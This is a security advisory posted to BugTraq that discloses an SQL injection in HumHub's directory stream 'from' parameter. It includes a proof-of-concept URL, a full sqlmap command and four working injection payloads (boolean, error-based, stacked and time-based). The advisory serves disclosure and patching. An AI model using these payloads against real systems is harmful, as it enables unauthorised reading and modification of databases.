BugTraq
LSE Leading Security Experts GmbH - LSE-2015-10-14 - HumHub SQL-Injection Nov 30 2015 03:48PM
advisories (advisories lsexperts de)
=== LSE Leading Security Experts GmbH - Security Advisory 2015-10-14 ===

HumHub - SQL-Injection
------------------------------------------------------------------------

Tested Versions
===============
HumHub 0.11.2 and 0.20.0-beta.2

Issue Overview
==============
Vulnerability Type: 89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Technical Risk: high
Likelihood of Exploitation: high
Vendor: HumHub GmbH & Co. KG
Vendor URL: https://www.humhub.org
Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn
Advisory URL: https://www.lsexperts.de/advisories/lse-2015-10-14.txt
Advisory Status: Public
CVE-Number: ----
CVE URL: ---

Impact
======
Enables to read and modify the HumHub Mysql Database.

Issue Description
=================
While conducting an internal software evaluation, LSE Leading
Security Experts GmbH discovered that the humhub social networking
software is subject to an sql-injection attack.

Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises to block
access to the humhub software until the vendor
provides a patch.

Proof of Concept
================

Opening the following URL

http://localhost/humhub/humhub-0.11.2/index.php?r=directory/directory/st
ream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5%27%22&m
ode=normal

shows the SQL-error, which is easily exploitable using sqlmap.

./sqlmap.py -u 'http://localhost:9933/humhub/humhub-0.11.2/index.php?r=directory/direct
ory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5&m
ode=normal' --cookie='pm_getting-started-panel=expanded; pm_new-people-panel=expanded; pm_user-statistics-panel=expanded; pm_new-spaces-panel=expanded; pm_spaces-statistics-panel=expanded; sin=f9vou17vnik100rrr5b26v8ip3; CSRF_TOKEN=d94129bfdd49e5d2c628928228519cd6b2c9cf54' --level=2 --risk=2 -p from -a

...

---
Parameter: from (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_publi
c,&sort=c&from=-4670 OR 5804=5804#&mode=normal

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_publi
c,&sort=c&from=5 AND (SELECT 7208 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(7208=7208,1))),0x7170786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=normal

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_publi
c,&sort=c&from=5;(SELECT * FROM (SELECT(SLEEP(5)))OXGN)#&mode=normal

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_publi
c,&sort=c&from=5 AND (SELECT * FROM (SELECT(SLEEP(5)))nBYr)&mode=normal
---

History
=======
2015-10-14 Issue discovered
2015-10-15 Vendor contacted
2015-10-15 Vendor response and hotfix
2015-10-20 Vendor releases fixed versions
2015-11-30 Advisory release

GPG Signature
=============
This advisory is signed with the GPG key of the
LSE Leading Security Experts GmbH advisories team.
The key can be downloaded here: https://www.lsexperts.de/advisories-key-99E3277C.asc

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJWXG/kAAoJEDgSCSGZ4yd84LoP/AtxdB/PLxRU7/5XkFsP9IXO
8TylBvC/8jHEq5f540HBquWOEoQ6noM0g9M6m9aUCMLAnGn0z1KPqjRHBp5WgGHQ
5VTM1OlLuJrQ3SrzyD0lFZFX6GHg3OQ2kjaWCgdoxwmGqwOKAGLt95r6qTAeM1sg
F/vMiV0s6LssFEicX6A3iX83FaYwHoh1N8nB8hvtL2O9jdqkjuZMxei1AIuAXHV7
vmRbuSQaZq5FM43/grdNcAvdiP9NJAXmyvjt//rRoNj5pGKwNnV7eFUcJqst6jUe
/DgjIGHO+HlyJeT97uE9M30hs4H0oWMKnSVbUgVmuJnCkwZ8AUIR7fSzICe8cxc/
gmvWUOFxhPWIMYAYxXj0rpAzTueDtYWTH3KECU/3IaYSnR68MWt7hPjRl6z36FhC
zhRxUNq+u3eIC/k33/aeT7jbzoQ5yvt9utYMmkur3JrvLPPS1AcH+KE00E1NcNDn
qZpkgJIE+dic399hZWYKo5KbrYpc2fLdVnEAjh61PAUr0SVlVU1WGvCcrk9KnYUo
lejznmF9yPvD1quwICeSeIr/oaaJq8vbR8zrNYoNV4Rx/jDp2W0OxEOejkmUySHR
dFQHnrjfoqAfePJdYga/CgCwDShhkVOWZkVTeoQ/9b1OkXZRN19XQFB/assbsnI5
tE2PghuKIj+GNodoJnhG
=vPtc
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus